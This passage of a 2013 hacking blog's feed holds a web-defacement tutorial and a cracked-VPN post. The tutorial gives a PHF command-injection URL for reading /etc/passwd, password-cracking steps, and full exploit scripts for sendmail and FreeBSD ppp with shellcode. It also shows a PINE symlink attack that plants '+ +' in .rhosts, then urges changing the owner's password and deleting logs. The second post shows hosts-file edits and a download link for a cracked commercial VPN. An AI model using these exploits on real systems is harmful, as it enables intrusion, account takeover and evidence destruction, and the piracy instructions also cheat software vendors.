/&gt;&lt;b&gt;noaccess:x:60002:60002:uid no access:/:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh&lt;/b&gt;&lt;br /&gt;&lt;b&gt;pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/&lt;/b&gt;&lt;br /&gt;&lt;b&gt;pin4geo:/bin/false&lt;/b&gt;&lt;br /&gt;&lt;b&gt;ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Shadowed password files have an &quot;x&quot; in the place of a password or&lt;br /&gt;sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Cracking a password file isn&#39;t as complicated as it would seem, although the files vary from system to system.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;1.The first step that you would take is to download or copy the file. &lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;2. The second step is to find &lt;/b&gt;a password cracker and a dictionary maker. Although it&#39;s nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That&#39;s where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, &quot;The Perfect Drug.&quot; As far as we know it will be one of the largest in circulation. &lt;/span&gt;&lt;/h3&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;3. You then start up the cracker and follow the directions that it gives you.&lt;/span&gt;&lt;/h3&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;The PHF Technique&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;Well I wasn&#39;t sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;The phf technique is by far the easiest way of getting a password&lt;br /&gt;file(although it doesn&#39;t work 95% of the time). But to do the phf all you do is open a browser and type in the following link:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;a href=&quot;http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://webpage_goes_here/cgi-bin/phf...in/cat%20/etc/&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #444444;&quot;&gt;passwd&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;(You replace the webpage_goes_here with the domain)&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;So if you were trying to get the password file for&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;a href=&quot;http://www.webpage.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;www.webpage.com&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;you would type:&lt;br /&gt; &amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;a href=&quot;http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.webpage.com/cgi-bin/phf?Q...%20/etc/passwd&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;and that&#39;s it! You just sit back and copy the file(if it works).&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;Telnet and Exploits&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find&lt;br /&gt;everything you need. It??s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I??m going to list a few below but the list of exploits is endless.&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;This exploit is known as Sendmail v.8.8.4&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;It creates a suid program /tmp/x that calls shell as root. This is how you set it up:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;cat &amp;lt;&amp;lt; _EOF_ &amp;gt;/tmp/x.c&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;br /&gt;&lt;b&gt;#define RUN &quot;/bin/ksh&quot;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;#include&lt;/b&gt;&lt;br /&gt;&lt;b&gt;main()&lt;/b&gt;&lt;br /&gt;&lt;b&gt;{&lt;/b&gt;&lt;br /&gt;&lt;b&gt;execl(RUN,RUN,NULL);&lt;/b&gt;&lt;br /&gt;&lt;b&gt;}&lt;/b&gt;&lt;br /&gt;&lt;b&gt;_EOF_&lt;/b&gt;&lt;br /&gt;&lt;b&gt;#&lt;/b&gt;&lt;br /&gt;&lt;b&gt;cat &amp;lt;&amp;lt; _EOF_ &amp;gt;/tmp/spawnfish.c&lt;/b&gt;&lt;br /&gt;&lt;b&gt;main()&lt;/b&gt;&lt;br /&gt;&lt;b&gt;{&lt;/b&gt;&lt;br /&gt;&lt;b&gt;execl(&quot;/usr/lib/sendmail&quot;,&quot;/tmp/smtpd&quot;,0);&lt;/b&gt;&lt;br /&gt;&lt;b&gt;}&lt;/b&gt;&lt;br /&gt;&lt;b&gt;_EOF_&lt;/b&gt;&lt;br /&gt;&lt;b&gt;#&lt;/b&gt;&lt;br /&gt;&lt;b&gt;cat &amp;lt;&amp;lt; _EOF_ &amp;gt;/tmp/smtpd.c&lt;/b&gt;&lt;br /&gt;&lt;b&gt;main()&lt;/b&gt;&lt;br /&gt;&lt;b&gt;{&lt;/b&gt;&lt;br /&gt;&lt;b&gt;setuid(0); setgid(0);&lt;/b&gt;&lt;br /&gt;&lt;b&gt;system(&quot;chown root /tmp/x ;chmod 4755 /tmp/x&quot;);&lt;/b&gt;&lt;br /&gt;&lt;b&gt;}&lt;/b&gt;&lt;br /&gt;&lt;b&gt;_EOF_&lt;/b&gt;&lt;br /&gt;&lt;b&gt;#&lt;/b&gt;&lt;br /&gt;&lt;b&gt;#&lt;/b&gt;&lt;br /&gt;&lt;b&gt;gcc -O -o /tmp/x /tmp/x.c&lt;/b&gt;&lt;br /&gt;&lt;b&gt;gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c&lt;/b&gt;&lt;br /&gt;&lt;b&gt;gcc -O3 -o /tmp/smtpd /tmp/smtpd.c&lt;/b&gt;&lt;br /&gt;&lt;b&gt;#&lt;/b&gt;&lt;br /&gt;&lt;b&gt;/tmp/spawnfish&lt;/b&gt;&lt;br /&gt;&lt;b&gt;kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/&quot;[ ]&lt;/b&gt;&lt;br /&gt;&lt;b&gt;*&quot;// |cut -d&quot; &quot; -f1`&lt;/b&gt;&lt;br /&gt;&lt;b&gt;rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c&lt;/b&gt;&lt;br /&gt;&lt;b&gt;sleep 5&lt;/b&gt;&lt;br /&gt;&lt;b&gt;if [ -u /tmp/x ] ; then&lt;/b&gt;&lt;br /&gt;&lt;b&gt;echo &quot;leet...&quot;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;/tmp/x&lt;/b&gt;&lt;br /&gt;&lt;b&gt;fi&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;And now on to another exploit.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h4 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Im going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;&lt;h4 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;C reating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE&#39;s process id as its contents. One may now simply do an echo &quot;+ +&quot; &amp;gt; /tmp/.hamors_lockfile, then rm / tmp/.hamors_lockfile.&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;This was writen by Sean B. Hamor??For this example, hamors is the&lt;br /&gt;victim while catluvr is the attacker:&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;hamors (21 19:04) litterbox:~&amp;gt; pine&lt;br /&gt;catluvr (6 19:06) litterbox:~&amp;gt; ps -aux | grep pine&lt;br /&gt;catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine&lt;br /&gt;hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine&lt;br /&gt;catluvr (7 19:07) litterbox:~&amp;gt; ls -al /tmp/ | grep hamors&lt;br /&gt;- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4&lt;br /&gt;catluvr (8 19:07) litterbox:~&amp;gt; ps -aux | grep pine&lt;br /&gt;catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine&lt;br /&gt;catluvr (9 19:09) litterbox:~&amp;gt; ln -s /home/hamors/.rhosts /&lt;br /&gt;tmp/.302.f5a4&lt;br /&gt;hamors (23 19:09) litterbox:~&amp;gt; pine&lt;br /&gt;catluvr (11 19:10) litterbox:~&amp;gt; ps -aux | grep pine&lt;br /&gt;catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine&lt;br /&gt;hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine&lt;br /&gt;catluvr (12 19:11) litterbox:~&amp;gt; echo &quot;+ +&quot; &amp;gt; /tmp/.302.f5a4&lt;br /&gt;catluvr (13 19:12) litterbox:~&amp;gt; cat /tmp/.302.f5a4&lt;br /&gt;+ +&lt;br /&gt;catluvr (14 19:12) litterbox:~&amp;gt; rm /tmp/.302.f5a4&lt;br /&gt;catluvr (15 19:14) litterbox:~&amp;gt; rlogin litterbox.org -l hamors&lt;br /&gt;now on to another one, this will be the last one that I??m going to&lt;br /&gt;show. Exploitation script for the ppp&lt;br /&gt;vulnerbility as described by no one to date, this is NOT FreeBSD-SA-&lt;br /&gt;96:15. Works on FreeBSD as tested.&lt;br /&gt;Mess with the numbers if it doesnt work. This is how you set it up:&lt;br /&gt;v&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;#define BUFFER_SIZE 156 /* size of the bufer to overflow */&lt;br /&gt;#define OFFSET -290 /* number of bytes to jump after the start&lt;br /&gt;of the buffer */&lt;br /&gt;long get_esp(void) { __asm__(&quot;movl %esp,%eax\n&quot;); }&lt;br /&gt;main(int argc, char *argv[])&lt;br /&gt;{&lt;br /&gt;char *buf = NULL;&lt;br /&gt;unsigned long *addr_ptr = NULL;&lt;br /&gt;char *ptr = NULL;&lt;br /&gt;char execshell[] =&lt;br /&gt;&quot;\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\  x07\x89\x56\x0f&quot; /&lt;br /&gt;* 16 bytes */&lt;br /&gt;&quot;\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\  x0b\x89\xca\x52&quot; /&lt;br /&gt;* 16 bytes */&lt;br /&gt;&quot;\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01&quot; /*&lt;br /&gt;20 bytes */&lt;br /&gt;&quot;\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\  x04\x07\x04&quot;; /*&lt;br /&gt;15 bytes, 57 total&lt;br /&gt;*/&lt;br /&gt;int i,j;&lt;br /&gt;buf = malloc(4096);&lt;br /&gt;/* fill start of bufer with nops */&lt;br /&gt;i = BUFFER_SIZE-strlen(execshell);&lt;br /&gt;memset(buf, 0x90, i);&lt;br /&gt;ptr = buf + i;&lt;br /&gt;/* place exploit code into the buffer */&lt;br /&gt;for(i = 0; i &amp;lt; strlen(execshell); i++)&lt;br /&gt;*ptr++ = execshell[i];&lt;br /&gt;addr_ptr = (long *)ptr;&lt;br /&gt;for(i=0;i &amp;lt; (104/4); i++)&lt;br /&gt;*addr_ptr++ = get_esp() + OFFSET;&lt;br /&gt;ptr = (char *)addr_ptr;&lt;br /&gt;*ptr = 0;&lt;br /&gt;setenv(&quot;HOME&quot;, buf, 1);&lt;br /&gt;execl(&quot;/usr/sbin/ppp&quot;, &quot;ppp&quot;, NULL);&lt;br /&gt;}&lt;/b&gt;&lt;/span&gt;&lt;/span&gt; &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;Now that you&#39;ve gotten root &quot;what??s next?&quot; Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their&lt;br /&gt; password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your.&lt;/b&gt;&lt;/span&gt; &lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/2637576698427082311/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/rooting-web-pages-without-exploit.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/2637576698427082311'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/2637576698427082311'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/rooting-web-pages-without-exploit.html' title='Rooting Web Pages without Exploit'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-pgItW4ZsrTY/UUxayy3XtHI/AAAAAAAAAF0/eDk6-Y2JPwM/s72-c/images.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-3061792079451456256</id><published>2013-03-20T14:17:00.001+05:00</published><updated>2013-03-23T13:45:04.939+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="cracked tools"/><category scheme="http://www.blogger.com/atom/ns#" term="hotspot shield cracked"/><title type='text'>HotSpot Shield Cracked full version (by SHAK)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-EeOX4CJSKZQ/UUln7Mv_9yI/AAAAAAAAAEY/koc56Ez6TeM/s1600/Hotspot+Shield.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-EeOX4CJSKZQ/UUln7Mv_9yI/AAAAAAAAAEY/koc56Ez6TeM/s1600/Hotspot+Shield.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Hello guys now a days many internet users are searching the way to bypass all blocked websites and want to get access, so I found this latest cracked version on my fellow &quot;MaDSHaK&quot;&#39;s blogger &lt;a href=&quot;http://shakzone.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Shakzone.blogspot.com&lt;/a&gt; (a very useful blogger to get free cracked softwares I suggest you to visit) so for this crack version all credit goes to him.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red; font-size: x-large;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;a href=&quot;http://adf.ly/LF1HC&quot; target=&quot;_blank&quot;&gt;Click Here To Download HotSpot Shield&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;!-- Begin BidVertiser code --&gt;&lt;script language=&quot;JavaScript1.1&quot; src=&quot;http://bdv.bidvertiser.com/BidVertiser.dbm?pid=521758&amp;amp;bid=1301130&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;&lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher_toolbar_creator.dbm&quot;&gt;toolbar maker&lt;/a&gt;&lt;/noscript&gt;&lt;!-- End BidVertiser code --&gt;   &lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;How to install:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;1) First go to C:\Windows\System32\drivers\etc and open hosts file with notepad. or editor.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2) Now paste the BELOW code just BELOW the last line of hosts file. i.e : 127.0.0.1&amp;nbsp; localhost&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Code:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;127.0.0.1 anchorfree.net&lt;br /&gt;127.0.0.1 rss2search.com&lt;br /&gt;127.0.0.1 techbrowsing.com&lt;br /&gt;127.0.0.1 box.anchorfree.net&lt;br /&gt;127.0.0.1 www.mefeedia.com&lt;br /&gt;127.0.0.3 www.anchorfree.net&lt;br /&gt;127.0.0.2 www.mefeedia.com&lt;br /&gt;127.0.0.1 hsselite.com&lt;br /&gt;127.0.0.1 www.hsselite.com&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Example Here:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-ScFlPJcYDyI/UUl8X5Kxq5I/AAAAAAAAAEo/yqpaffruX2Q/s1600/Capture.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;199&quot; src=&quot;http://3.bp.blogspot.com/-ScFlPJcYDyI/UUl8X5Kxq5I/AAAAAAAAAEo/yqpaffruX2Q/s320/Capture.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;(Note: all these above sites are used when you use HotSpot Shield ,for the sake of this Method we are blocking them :p&lt;span style=&quot;color: #666666;&quot;&gt;&lt;b&gt;)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;3) Now save This Host file and then Extract Your Downloaded file using Winrar&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://www.win-rar.com/fileadmin/winrar-versions/winrar/wrar420.exe&quot; target=&quot;_blank&quot;&gt;Click Here If You Dont have WinRar&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;5) Now you will notice i have given two setup file one is in File1 folder and the other is in File2 folder.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Now open File1 folder and install setup given in it...while installing UN CHECK THE OPTION LAUNCH AFTER INSTALLATION &amp;amp; UNCHECK THE TOOLBAR INSTALLING OPTION...and restart your PC.&lt;br /&gt;&lt;br /&gt;6) After restarting without opening previous installed hotspot shield setup...install the setup given in File2 Folder.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;This will upgrade the previous installtion &amp;amp; again as before unchecked the option for LAUNCH AFTER INSTALLATION &amp;amp; TOOLBAR.&lt;br /&gt;&lt;br /&gt;7) Now Restart Your PC Again.&lt;br /&gt;&lt;br /&gt;8) After Restarting...just double click or press connect now you are Using hotspot shield elite with no Ads/banner/Trial&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Enjoy : D&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;/h3&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/3061792079451456256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/hotspot-shield-cracked-full-version-by.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3061792079451456256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3061792079451456256'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/hotspot-shield-cracked-full-version-by.html' title='HotSpot Shield Cracked full version (by SHAK)'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-EeOX4CJSKZQ/UUln7Mv_9yI/AAAAAAAAAEY/koc56Ez6TeM/s72-c/Hotspot+Shield.jpg" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-2139461283499346609</id><published>2013-03-18T20:02:00.000+05:00</published><updated>2013-03-22T18:24:19.915+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="network penetration testing"/><title type='text'>Metasploit java applet attack on WAN (Internet) By Zahid Adeel</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/--TYR4Fl4dG4/UUxbe-C_M6I/AAAAAAAAAF8/gI9026vFrVE/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; 